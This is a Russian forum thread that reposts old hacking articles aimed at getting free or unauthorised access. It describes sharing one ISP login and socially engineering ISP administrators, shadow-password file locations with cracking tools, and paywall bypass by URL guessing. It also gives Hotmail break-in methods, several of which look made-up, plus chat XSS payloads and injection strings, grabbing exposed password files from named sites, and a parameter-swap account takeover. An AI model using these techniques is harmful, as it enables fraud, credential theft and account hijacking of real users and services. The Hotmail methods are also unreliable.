При слове "халявный Инет" ты вспоминаешь злобных троянчиков, расшаренные винты и глупых юзеров с паролями qwerty? Ну-ну, вспоминай, а я сейчас тебе расскажу, как я поимел реальную халяву со своего прова, не обманывая глупых, но несчастных юзеров. Да и вообще, я не понимаю: зачем взламывать что-то или кого-то, когда есть легальные способы сэкономить на Инете. Весь мой рассказ будет построен на моем личном опыте, поэтому можешь быть уверен, что я это знаю не понаслышке.

Выборы 2000

Первое, что ты должен сделать - это правильно выбрать провайдера. Чем правильнее будет твой выбор, тем больше денег ты сэкономишь. Если ты живешь в крупном городе, то у тебя никаких проблем не возникнет: в течение месяца можно легко вычислить провайдика, который будет удовлетворять (в хорошем смысле слова) твоим требованиям.

Итак, основное условие, которое я поставил своему избраннику - он должен быть не самым крупным в городе, но и не самым мелким. Тебе советую того же - держись золотой середины, потому как у больших ISP есть опыт работы с такими халявщиками, как ты, и, соответственно, иммунитет от тебя. :) А у мелких настолько слабая база для халявщика, что даже как-то неприлично.

Провик должен предоставлять пакеты доступа, такие как "неограниченный доступ ночью за ХХХ сумму" или нечто подобное. Наверно, это одно из самых главных условий.

Самый легкий и самый простой способ сэкономить зеленых президентов - это установка локального прокси-сервера. Я выбрал WinProxy. Ты выбрал себе прокси, теперь надо только сброситься с друзьями (лучше 3-4 человека из твоей локалки), подключиться к провику и всем пихаться через одну дырку во всемирную сетку. Вот так я и поступил с корефанами, взяв неограниченный доступ ночью за 12 баксов.

Через пару дней мне стало не хватать скорости, впрочем, как и не хватит тебе при таком раскладе. Через три дня я пошел потусоваться с друганами, пивка подтянуть, девочек поклеить. Зная, что после всего этого буду нетрезв, я оставил логин и пароль от ночного Инета соседу. В ту ночь он без проблем смог подсоединиться и полазить по сети через мой логин. После будуна до меня доперло: у прова отсутствовали определители номеров, и можно было лазать в Инет из-под одного логина, мне и моим корефанам, с единственным условием - не коннектиться в сеть одновременно.

Узнав сей факт, мы решили распределить всю ночь на троих: каждый лазал в Инете в строго отведенное ему время. Но мне опять стало мало, и я решил попробовать одновременно подключиться с разных телефонов по одному логину. И опять эта фишка прокатила на "ура". Это означало, что у прова не учитывается количество подключенных с одного логина. Глупый провайдерчик думал, что в сети только один чел с моим логином.
Так мы наклоняли моего провайдера в течение двух месяцев: шестеро корефанов обнимались со своей палочкой-выручалочкой с 0:00 до 8:00 и платили всего 2 бакса с рыла. Нехилая экономия? Я так и думал, что ты со мной согласишься. Самое главное - не было никакого взлома. Все просто и, главное, легально (не учитывая то, что в полиси прова написано о том, что при Night surf`e в Инете может находиться только один чел. ;)
Но мне опять стало мало. Я решил пойти на крайние меры. Кто не рискует - тот не писается в трусики, а трусики именно для этого и предназначены, особенно если они с крылышками. Но об этом по порядку.

Высшая мера наказания провайдера

Я забыл тебе рассказать, как получать доступ днем, если ты сидишь на плане ночного Инета (на план лучше не садись). ;) Объясняю. Если хочешь забрать почту или в очередной раз обнять свою палочку, глядя на голых девок, то тебе нужно пройти следующие круги ада:

1. Позвонить администратору своего прова, лучше всего в конце рабочего дня. Приблизительно в 17:00 - 18:00.

2. Прикидываясь унитазным шлангом, сказать что-то типа:

"Извините, мы не местные, в договоре написано, что я могу воспользоваться вашими услугами по настройке, если у меня возникнут проблемы. У меня почему-то возникают проблемы при дозвоне".

Админ попросит рассказать: чё за проблемс у тебя, паца? Если так, то начинаешь жаловаться на плохую связь или на "не ответы сервера". Админ начнет тебя грузить: надо жать на пимпу, дергануть загогулину и все будет пинцетно.

3. Внимательно выслушиваешь админа. Понимающе поддакиваешь, но ничего не делаешь из того бреда, что он скажет.

4. Перед тем как повестить трубку, ты спрашиваешь: "А можно мне сейчас попробовать?". Админ, с 90%-ой вероятностью, ответит: "ДА". Вот тут не теряйся и спроси: "А меня пустят, у меня ведь доступ только ночью?".

5. Все. Считай, что у тебя есть доступ в Инет. Админ просто не сможет тебе отказать. Если ты хочешь, чтобы такую халяву можно было поднять в дальнейшем, обязательно предупреди админа, что если у тебя что-то не получится, ты перезвонишь завтра.

Теперь ты можешь забрать очередную почту. Только советую долго не задерживаться в Инете. Тебе нельзя долго светиться, если хочешь улучшить свое положение.

Так, теперь сделай передышку. Два наклона вперед и два назад, 20 приседаний, 50 отжиманий, 100 подтягиваний на турнике. Готов продолжать? Ну, тогда поехали. На следующий день попробуй войти в Инет. Если не получилось, то опять позвони админу и снова прикинься шлангом, только потолще. Для чего это надо? Ты думаешь, что это нужно, чтобы снова почту скачать? Ни хрена подобного. Админы очень ленивые и очень занятые люди. И на второй или третий раз админ забудет заблокировать тебе доступ. Вероятность этого будет выше, если ты послушал меня и звонил в конце рабочего дня.

Я тебе отвечаю на зубы дядюшки Билли Гейтса, что у меня это прошло с первого раза. Конечно, тут есть определенный момент везения, но... у хацкера все получится железно! А теперь посмотрим, что будет, если админ забудет заблокировать тебе доступ:

1. Доступ в основном описывается одной строкой, то есть с 0:00 до 8:00.

2. Когда админ, после твоего звонка, откроет доступ, то он не сможет добавить еще одну строку, а исправит существующую. Это значит, что твой доступ станет с 0:00 до 19:00.

Именно такой доступ я имел в течение двух месяцев, около года назад. Почему так не долго? Нет, меня не вычислили, я просто забыл заплатить. ;) А потом я просто сменил прова, чтобы не светиться у старого. Как видишь, вполне реально получить за 2 бакса доступ практически на 24 часа в сутки. Все зависит от лености админа. В подкрепление реальности моего метода сообщу, что после меня такую фишку проделывали ещё несколько челов. И все поднимали халяву, хорошую халяву. Админ - тоже человек (несмотря на всю парадоксальность мысли),и он такой же ленивый, как и ты.
И что я с этого получу?

Пора мне уже подвести итоги. Для получения практически халявного доступа тебе надо:

1. Позвонить админу и рассказать сказку о сером козленке.

2. На следующий день проверить коннект. Если его нет, то возвращаешься к пункту (1) и на этот раз пересказываешь админу "Войну и мир". Если опять не поможет, то попробуй прочитать админу полное собрание сочинений Ленина.

Даже если у тебя это не прокатит, не огорчайся. Ты же все-таки получил халявный доступ днем.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:50. Заголовок: Re:


По FTP без следов
Пyтешествyя по Интеpнетy, мы часто не дyмаем о том, что оставляем следы своих посещений каждый pаз, когда заходим на какой-либо ftp сайт. Стандаpтные log-файлы любопытных владельцев способны yзнать о вас многое, и пpежде всего ваш IP адpес, что pавнозначно напpимеp томy что yзнали ваш телефон.
Сyществyет несколько способов защитить свое privacy от подобных посягательств.

Способ 1: Пpокси Анонимизиpовать пyтешествие по сети можно с помощью пpокси сеpвеpа. Пpокси сеpвеp pаботает, по сyти, как Анонимайзеp, т.е. докyмент с сайта "забиpает" он, а не вы. Большинство пpокси сеpвеpов огpаничивают достyп на основании IP адpеса, с котоpого пpиходит обpащение. Иными словами, если вы пользyетесь пpовайдеpом Demos, то пpокси сеpвеp Glasnet вас к себе попpостy не пyстит. Hо к счастью, в сети всегда можно найти "добpый" пpокси, владельцы котоpого либо откpыто заявляют о его достyпности для всех желающих (напpимеp этот), либо пpокси, котоpый по той или иной пpичине не огpаничивает достyп только своим доменом, о чем шиpокой пyблике не известно, напpимеp:
name: port:
svc.logan.k12.ut.us 8001
proxy1.emirates.net.ae 8080
proxy.sysnet.it 8080
www.archmate.com.tw 3128
www-proxy.global-one.ru 3333
sunsite.cs.msu.su 3128
www.anonymizer.com 8080
squid.nlanr.net 3128

Для настpойки FTP клиентов как пpавило пpокси-сеpвеp надо yстановить в passive pежим. Пpоделав этy нехитpyю опеpацию, вы сможете пyтешествовать по сети, оставляя след как болгаpский или амеpиканский пользователь, но... тyт есть один очень важный момент. Далеко не все пpокси сеpвеpы являются полностью анонимными. Hекотоpые из них позволяют администpатоpy сайта, котоpый вы посещаете с использованием пpокси, пpи желании опpеделить IP адpес, с котоpого пpоисходит обpащение к пpокси, т.е. ваш pеальный IP адpес. Пpовеpьте свой пpокси на пpедмет его полной или неполной анонимности: http://www.tamos.com/bin/proxy.cgi
скоро функция проверки proxy будет доступна на нашем сайте.
Если вы полyчите сообщение Proxy server is detected! - ваш пpокси имеет "дыpy", и вам бyдет пpедоставлена инфоpмация о вашем pеальном IP адpесе, как впpочем и об IP адpесе пpокси сеpвеpа, котоpый вы использyете. Если же сообщение гласит Proxy server is not detected - все в поpядке! Рекомендyется пеpиодически (не pеже чем pаз в месяц) пpовеpять те пpокси с котоpыми в pаботаете на пpедмет анонимности.
В заключение еще несколько сообpажений касательно использования пpокси сеpвеpов. Работа чеpез далеко pасположенный пpокси снижает скоpость пеpедачи данных и вpемя ожидания. Кpоме того, автоp HЕ pекомендyет использовать пpиведенные выше адpеса пpокси, посколькy если все читатели станyт их использовать, то очень скоpо yдовольствие кончится и достyп к ним бyдет закpыт (если yже не закpыт).
Hайдите свой пpокси сами, это несложно. Автоp нашел эти адpеса за 5 минyт. В Альтависте набеpите ключевые слова, что-нибyдь вpоде proxy+server+configuration+Netscape, и вы полyчите список стpаниц, где пpовайдеpы pассказывают своим пользователям, как настpоить их бpаyзеpы для pаботы с пpокси.
Пpобyйте все подpяд, на пятый или седьмой pаз вас ждет yдача - пpокси согласится с вами pаботать.

Способ 2: Стиpайте содеpжимое кэша.
Большинство FTP клиентов сохpаняют в специальной диpектоpии все те места в Интеpнет где
вы были (а иногда сохpаняют и нешифpованные имена и паpоли). В целях вашей безопасности целесообpазно пеpиодически (скажем либо каждый день, либо pаз в неделю) стиpать содеpжимое кэша. Hапpимеp в Bullet Proof FTP (лyчшей на наш взгляд пpогpамме, ее можно скачать на http://www.bpftp.com) он pасполагается в диpектоpии: Cache. Лyчше пpоизводить невосстановимое стиpание, напpимеp с помощью пpогpаммы Kremlin 2.1.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:51. Заголовок: Re:


Как хакнуть провайдера
Итак, давайте разберемся, что такое хакинг. Как известно, все программы не идеальны, то есть они не защищены от наличия ошибок (багов/bugs). Значит, мы можем воспользоваться недочетами системы, правильно?

Да! Бьюсь об заклад, что вам бешено хочется скорее узнать о том, как бы "хакнуть" провайдера и сидеть в инете на халяву. Ладно, я приоткрою для вас эту завесу и расскажу несколько основных принципов взлома и о взломе прова вообще.

Во-первых, надо узнать, на какой платформе стоит провайдер. Сделать это можно обычной утилитой ftp, которая входит в состав Виндов (Windows). Итак, присоединяемся к прову по ftp. Делается это так. К примеру, доменное имя вашего прова - glassnet.ru. Открываем Пуск/Выполнить и пишем ftp. Жмем enter. Поясняю: ftp - это утилита для перенесения файлов с компа на комп, то есть FileTransferProtocol. Итак, мы в невзрачном окне, и перед нами подсказка системы ftp. Пишем "open glasnet.ru" - что мы написали? Мы подсоединились к glasnet.ru, и все! Перед вами поле для ввода логина и пароля, но выше написано, в какой вы системе. Скорее всего, будет что-нибудь из UNIX'овских операционок. Вам, конечно же, нужен файл с паролями и логинами. Вот где он может быть:
Тип Юниха Место, где хранится нужный файл
AIX 3 /etc/security/passwd !/tcb/auth/files/[first letter #of username]/[username]
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO UNIX #.2.x /tcb/auth/files/[first letter* of username]/[username]
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow[optional NIS+ private secure maps/tables/whatever]
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *

Предположим, что вы установили тип ОС провайдера и взяли файл с паролями (о том, как его взять, мы поговорим позже). И что же вы видите: striker:5gg57G422dfhj:98:10:Striker:DjStriker:/home/sc/sun:/bin/bash Это что еще за монстр? А где пароль, а где логин? Объясняю: это можно перевести так:

1) Имя пользователя: Striker;
2) Расшифровка пароля: 5gg57G422dfhj;
3) Номер пользователя: 98;
4) Номер группы: 10;
5) Информация GECOS: DjStriker;
6) Каталог по умолчанию: /home/sc/sun
7) Shell: /bin/bash.

Да, но как расшифровать пароль? Да очень просто. Берем прогу под названием John The Ripper, эта прога перебирает все комбинации или пользуется готовым словарем возможных комбинаций. Хочу сразу предупредить, что пароли могут раскриптироваться довольно долго! Нормальные пароли типа he_!$*74 будут разгадываться лет пять!!! Не беспокойтесь, есть же и другие пароли у людей.

Прогу можно взять здесь: http://www.false.com/security/john/index.html или поищите ее на http://astalavista.box.sk

Ну, теперь о самом больном , о том, как бы взять этот файл от провайдера. Для начала надо обучиться UNIX грамотности. Я уже говорил, что каждый хакер должен знать UNIX, так вот вам несколько UNIX команд:
Примеры UNIX команд
at Показывается день/час, когда выполнится команда
batch Выполнение команд в процессе загрузки
chmod Этой командой вы можете изменить полномочия файлового доступа
chown Был у файла один хозяин , а стал другой
cron Это демон команд batch и at
crontab Можно указать промежутки времени, в течение которых будут выполнены какие-либо команды
ftp Работа с удаленным компом. Принимаем или пересылаем файлы
kill Послать некоторому процессу сигнал о конце работы
logname Получить регистрационное имя
pwcheck Проверить файл паролей (/etc/passwd - по умолчанию)
mail Прием или пересылка е-message
who Отобразить список текущих юзеров
telnet Доступ к удаленному компу
umask Маска полномочий для нового файла
news Отобразить статью из конфы Usenet
whois Получить инфу о текущем узере
write Переслать записку все тому же текущему юзеру
uux Выполнение команд UNIX на удаленном компе
nslookup Получить сведения об IP-адресе домена
uucp Копировать файлы из одного компа UNIX в другой
uuname Отобразить список хостов UUCP
su Если умело применить , то можно стать привилегированным пользователем Я точно не знаю о применении команды su
rm Стереть файл или каталог
sleep Не выполнять команду на данное время
passwd Создать/изменить пароль
ps* Посмотреть , какие процессы на данный момент активизированы

*Очень интересная команда: вы можете присоединиться к компу (если имеете на нем аккаунт) и набрать: к примеру, на компе сидит root, ps -x -u root и вы узнаете, что запущено в сети у root'a!


Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:52. Заголовок: Re:


ХАЛЯВА НА ПЛАТНЫХ СЕРВАКАХ!
Сегодня я расскажу про то как можно халявно влезть на платный сервак. Можно конечно пользоваться сгенеренными кредитками (кстати, в передачи "О, счастливчик!" по НТВ Дебров показывает кредитку. Запиши этот момент на кассету, а потом если внимательно вглядываться можно разглядеть ее номер и пользоваться:)), но я Тебя сегодня познакомлю с другими способами. Начнем с того что большинство сайтов запрашивают логин и пароль только на входе. Тоесть сам сайт хранится в какой-то папке и Тебе никто не мешает набрать в адресной строке браузера адрес на эту папку. Догадаться что это за папка сложно. Поэтому надо воспользоваться вспомогательным софтом. Я рекомендую GRINDER и BlackWidow. Есть и другой способ. Для этого Тебе просто понадобится прога для качания каталогами. Скачиваешь себе порносайт, открываешь его в проводнике. Или в Explorer'е, если у Тебя 95 винды и начинаешь просматривать картинки jpg и gif. Теперь давай представим что Тебе хочется в дальнейшем вернуться сюда. Тогда просто запоминаешь адрес странички с порнухой (разумеется той, которая стоит за чертой MEMBERS) и потом набрав эту строку в браузере Ты сможешь туда вернуться. Даже если срок оплаты истек. Лучше вообще не запоминать адрес а знести его в "Избранное". Допустим что Ты настолько крут, что раздобыл кредитку. Что дальше? А дальше топай на AdultCheck и регистрируйся там. После регистрации там они Тебе выдают ключ с которым Ты можешь лазить по туевой хуче сайтов. Давай рассмотрим еще один вариант пролазинья. Дело в том, что многие порносайты дают демо-доступ. Этим мы и воспользуемся. Рассмотрим пример с сайтом LiveTeen (мой любимый порносайт:)). Каждому какому-то посетителю они дают демо-вход. С этим демо-входом ты можешь у каждой бабы посмотреть по 15 фоток и несколько фоток из видео-файлов. Возьмем к примеру девку по имени Chloe. Адрес первой ее фоток выглядит таким образом: http://www.liveteen.com/*******/Chloe-Caprise/Chloe. Так вот в этой папке лежат файлы с именами chl001.jpg, chl002.jpg, chl003.jpg и так до chl015.jpg. А кто мне мешает ввести chl080.jpg? Да никто! тоже и с видео. Возьмем к примеру файл .../video/amanda/vid001.jpg. Просто меняем jpg на mov и вперед. Возьмем еще сайт "В постели с Аленкой". Он не платный, но чтобы узнать пароль надо где-то час лазать по разным баннерам, один из которых оказывается долбаным (битым, с ошибочным href="..."). на этом поиски пароля заканчиваются. Но нам дают демо вход для просмотра всех картинок в мелком формате. Адрес картинок .../small/*.jpg. Заменяем small на full и смотрим фоты в полнометражном формате. Я догадался что надо поставить слово full с третьего раза (на сайте было написано, что для полного доступа надо ввести пароль). Ну и все. Это не единственные способы, но их Тебе хватит. Ниодин сервак не устоит.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:53. Заголовок: Re:


способа взлома HotMail
Существует несколько способов взломать hotmail. И одни из них приведены ниже . Помните, что эта информация - для образовательных целей !
I способ - Жесткий взлом .
a. Используйте telnet, чтобы соединиться с портом 110 (Hotmail_s сервером)
b. Напечатайте ПОЛЬЗОВАТЕЛЯ и затем имя пользователя жертвы
c. Напечатайте пароль и затем предположительный пароль
d. Повторяйте это до тех пор , пока не найдете правильный пароль.
!. Это называется жесткий взлом и требует терпения.

II способ - Лучший путь для взлома
a. Получите username жертвы (Оно обычно прописывается в начальной области адреса)
b. Имея его username напечатайте " www.hotmail.com/cgi-bin/start/victimsusername "
c. И вы в....,

III способ - Считается старым путем взлома
a. Пойдите на Hotmail_s homepage, и получите адрес (если у вас его еще нет)
b. Log out
c. Теперь напечатайте username жертвы .
d. Смотреть на source code.
e. В пятом ряде вы должны найти "action=someadress"
d. Скопируйте тот адрес и вставте его в область адреса
e. И вы в...

IV способ - Другой ...
a. Идите на hotmail_s homepage
b. Скопируйте исходный source code.
c. Создайте новый html файл с тем же самым содержимым, но измените method=post на method=enter
d. "Рассмотрите" страницу
e. Изменить адрес на www.hotmail.com/ (не нажимайте интер !)
f. Напечатайте жертву в его username и пароле
g. Посмотрите в область адреса. Там вы увидите ...&password:something ...
h. пользуйтесь на здоровье !

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:54. Заголовок: Re:


Еще раз о взломах HTML-чатов.
1. ЧАСТЬ ПЕРВАЯ, или показываем свое.

Основу интерфейса практически любого чата соствляют динамически генерируемые HTML-формы, связанные между собой посредством javascript. В практически всех чатах имя пользователя и пароль (или некий идентификатор, который генерируется при входе пользователя) хранятся внутри формы в качестве скрытого (hidden) элемента и могут извлекаются оттуда посредством скрипта. Заставив кого-либо из посетителей чата выполнить свой javascript, Вы можете, по сути, получить полный контроль над ним - сказать фразу от его имени или выдать его пароль.

Для человека, знающего хотя бы основы HTML и Javascript, не составит труда разобраться в структуре интерфейса чата, но вот подсунуть в эту структуру "троянский" скрипт - это проблема.

В простейшем случае, когда набираемый вами текст показывается в окне чата "как есть" - без какого-либо контроля - вы просто вводите текст вашего скрипта. Если возникает проблема с ограничением на длину строки - разбейте скрипт на несколько коротких функций.

Но в большинстве чатов все же имеется проверка, которая не дает ввод большинства "опасных" тегов, в т.ч. и <script>, либо запрещены теги вообще. Но тем не менее во многих случаях удается ее обойти. Ведь помимо тэга <SCRIPT> есть еще и казалось бы безобидные теги <A>, <IMG> <FORM> и другие, которые позволяют задать URL как javascript: или задать отклики объекта на события: OnClick, OnMouseOver и т.д.

Кроме того, теги могут проверяться в основном окне чата, но не контролироваться при вводе информации о пользователе. И можно вставить скрипт, например, в информацию о себе. Тогда тот участник чата, который имел неосторожность посмотреть вашу информацию получит вместо нее ваш скрипт. Например, следующий скрипт помещенный в личную информацию успешно работал на чате Copris (сейчас чат, похоже, накрылся, так что я смело его помещаю):

<script>
for( I=1 ; I<=11 ; I++ ){
if( I==1 ) alert( "Че те надо?????" );
else alert( "Я тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че
те надо???" );
}
alert("а здесь все равно нету нифика...");
top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1;
top.frames['Inform'].document.forms[0].Announce.value = "Я люблю тебя,
DemoNitE!";
top.frames['Inform'].document.forms[0].submit();
top.frames['Dark'].document.forms[2].submit();
</script>

Этот безобидный скрипт дает alertы посетителю, после чего помещает признание любви к DemonitE от имени посетителя в общее окно чата. Это стимулирует остальных посетителей на просмотр личной информации о DemonitE. Тем не менее, скрипт можно было сделать и менее дружественным - например, посылать в приват пароль посетителя, который хранится в виде в виде скрытого элемента формы в каждом фрейме. Более того, можно было бы даже написать что-то типа вируса, который, например, меняет имя пользователя на "DemonitE" и ставит ему соответствующий пароль. Таким образом можно заразить всех участников чата. Изменение скрипта таким образом, чтобы высылать в приват пароль посетителя и превращать его в DemonitE (при этом все его сообщения будут исходить от DemonitE, но видеть сообщения для нее он не будет), требовало ровно пять дополнительных строчек на javascript (три на первое действие и два на второе).

Похожая дыра присутствует в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста. Как правило, вводимые им значения цвета не проверяются. Напрямую, или путем модификации странички, сохранив ее на диске (в том случае, если цвет предлагают не ввести и выбрать из набора), можно, например, в качестве цвета вместо любимого значения 'black' задать '><script' (если таг печатается в чате как <FONT COLOR=black> Если печатаются кавычки (COLOR="black"), то задача несильно усложняется - надо всего лишь их нейтрализовать, например '"><script p="'.

Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но, нужно отметить, что засунуть закрывающий таг тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком.

2. ЧАСТЬ ВТОРАЯ, или смотрим чужое.

И, наконец, существует несколько способов простого хищения паролей из чатов. Если чат расположен на сервере apache, и проверяет имена пользователей по файлу htpasswd (при этом ваш браузер выкидывает окошко с предложением ввести имя и пароль для доступа к ресурсу), то всегда есть вероятность, что нерадивые администраторы положили его в доступный каталог. Можно для этого воспользоваться URL типа http://www.somechat.com/chat/.htpasswd. Точное расположение файла можно узнать стянув файл .htaccess из данной директории. Это, обычно не удается. Но часто удается стянуть его копию, которая осталась с последнего редактирования файла, например http://www.somechat.com/chat/.htaccess~ или http://www.somechat.com/chat/.htaccess.old (в том случае, если копии этих файлов любезно оставлены администратором).

Если чат расположен на Микрософтовском сервере и использует ODBC для доступа к базе данных паролей, то можно попытаться стянуть файл с базой, например если она имеет формат Microsoft Access и хранится в том же каталоге, то достаточно просто угадать ее имя, чтобы получить полную информацию обо всех пользователях вместе с паролями :) Классический пример - чат "Пластилин" (я уже послал уведомление администраторам чата): http://www.plastilin.nnov.ru/talkzone/talkzone.mdb

Следует сразу заметить, что почти все сказанное выше справедливо не только для HTML-чатов, но и для других WEB-сервисов, таких как доски объявлений (WWW-boards) или гостевые книжки (Guestbooks).

DemonitE[RAH]

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:55. Заголовок: Re:


Имеем навароченный чат на примере www.klinnet.ru.
В принципе, статья посвящена некоторым уязвимостям, которые могут скрываться во всяких дополнительных (и кстати совершенно ненужных) фишках веб чатов, таких как комнаты, смена цвета шрифта, пароли и тд. Для примера возьмём чат на сервере www.klinnet.ru. Давай повнимательнее изучим нижний фрейм (input frame). Сразу бросается в глаза огромное кол-во скрытых полей. TYPE="hidden" NAME="Ign" VALUE="" Это функция игнора (очень даже полезная вещь). TYPE="hidden" NAME="N" VALUE="20" А это кол-во строк, которые выводятся на экран. Самое интересное, что эти фишки юзаются командами. Короче, ирк форэвэ. А вообще, чат расчитан на большое кол-во народа, причём _разных_национальностей_ (TYPE="hidden" NAME="L" VALUE="russian"). Моё мнение: чат был написан 100%нтно не любителями-програмистами, а серьёзной забугорной фирмой, скорее всего с коммерческими целями. То есть защита обещает быть крутой. Ладно, знакомство с чатом закончено, давай теперь посмотрим насколько наши забугорные друзья продвинулись в плане безопасности. При входе каждому юзеру присваивается идентификатор (его хешированный пароль; прописан в нижнем фрейме), так что от лица других юзверей, не зная их идента, говорить не получится. Символы < и > преобразуются в < и > соответственно. Так что и теги не вставишь. Ну как? Впечатляет? Где-то года два назад трудно было найти чат с такой защитой. Ну всё, защиту мы рассмотрели. Приступим, пожалуй, непосредственно к главной теме статьи. Продолжаем изучать нижний фрейм. Видишь там такой уродливый набор цветов? Наведи мышь, к примеру, на ярко красный цвет (самый левый) и вглядись в тот url, на который он ссылается: http://www.klinnet.ru/chat/input.php3?From=..%2FphpMyChat.php3&Ver=H&L=russian&U=D4rkGr3y&R=KlinNet&T=1&D=10&N=20&O=0&ST=1&NT=1 Подумай, почему такая длинная ссылка? Да потому, что при нажатии на эту кнопку нижний фрейм как бы _перезапускается_ с новыми параметрами. Проще говоря, обновляются ВСЕ параметры вместо одного. То есть, если в параметре "U" пропишем вместо "D4rkGr3y" имя другого юзера, то мы _не_поменяем_ему_цвет_, а как бы перезайдём без авторизации под его ником. Как следствие сможем базарить от его лица и узнаем его хешированный пароль. В чём проблема? Да в том, что pwd_hash нужно было проверять.. Кстати говоря, этот баг почти сразу заделали и мне пришлось искать новые...Они нашлись =) (последующие два бага на момент написания статьи были не заделаны) Вглядись в правый фрейм. Что ты там видишь? Кнопку "Выход"? Да, я тоже её вижу. Здесь в принципе уязвимость такого же рода. Вот на что ссылается "Выход": http://www.klinnet.ru/phpMyChat.php3?Ver=H&L=russian&U=D4rkGr3y&E=KlinNet&EN=1 И опять pwd_hash не проверяется. Как следствие, подменив ник, можем кикать бедных юзеров. Ну и последний, наиболее крутой баг. Ты наверное уже заметил, что чат поддерживает создание нескольких комнат. Заметил? Так вот меня во всём этом бесило то, что нельзя сидеть одновременно в двух комнатах, то есть или в той, или в этой. Посмотри, что происходит, когда ты переходишь из одной комнаты в другую? Вот как выглядит ссылка на переход в другую комнату: http://www.klinnet.ru/phpMyChat.php3?Ver=H&L=russian&U=D4rkGr3y&R0=KlinNet&T=1&D=10&N=20&E=fuck&EN=1 Полностью перегружаются все три фрейма, плюс к этому не проверяется pwd_hash. Спросишь, что нам это даёт? Да всё! Полный контроль над любым юзером! Подменив его ник, можем говорить от его лица, _слушать_его_приваты_ (так как центральный фрейм тоже обновляется), редактировать все его настройки (в том числе и пароль). Вот так.. Ну и напоследок, в чём же основные проблемы чата? Во-первых, хеш надо проверять ВЕЗДЕ, а во-вторых, не понимаю, зачем при изменении какого-то одного параметра, обновлять все? Если бы все не обновлялись, баги с комнатами и изменением цвета нам вообще ничего серьёзного бы не давали...

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:55. Заголовок: Re:


Что можно сделать с IP адресом!
Как известно, Internet основана на семействе протоколов tcp/ip, определяющих, каким образом осуществляется взаимодействие между подключенными к сети компьютерами. Идентификация этих компьютеров осуществляется с помощью так называемых IP-адресов, каждый из которых представляет собой уникальный 32-битный идентификатор, обычно записываемый в виде четырех десятичных чисел, например, 192.168.0.1. И с точки зрения адресации сервер, обрабатывающий ежесекундно тысячи запросов практически ничем не отличается от вашего компьютера, подключаемого к сети по dial-up. Единственная разница домашний пользователь, как правило, получает так называемый динамический ip-адрес, меняющийся от подключения к подключению.
В то время как адрес сервера должен быть доступен всем клиентам, желающим воспользоваться его услугами, клиент вовсе не обязан афишировать свой адрес на каждом углу. Более того, обнародование ip-адреса может привести к весьма серьезным последствиям.

Что можно сделать с человеком, зная его ip-адрес? Ну, например, если на его машине с Windows'95 живет NetBIOS over IP, и разделены для доступа по сети, да еще и без паролей, некоторые диски, то довольно много :) (для заинтересовавшихся - помочь здесь могут nbtstat, lmhosts и net use). Правда это не слишком часто встречается у dial-up пользователей. Другой пример - в прошлом году были найдены дыры в IE и NN, позволяющие получить доступ к файлам клиента. Дырки те, правда, уже прикрыли, но кто знает, сколько их еще осталось.

До сих пор пользуются популярностью в определенных кругах программы, объединяемые общим названием (восходящего к первой программе этого класса - Winnuke), которые осуществляют атаки типа Denial of Service, приводящие к зависанию или отключению от сети атакуемого компьютера.

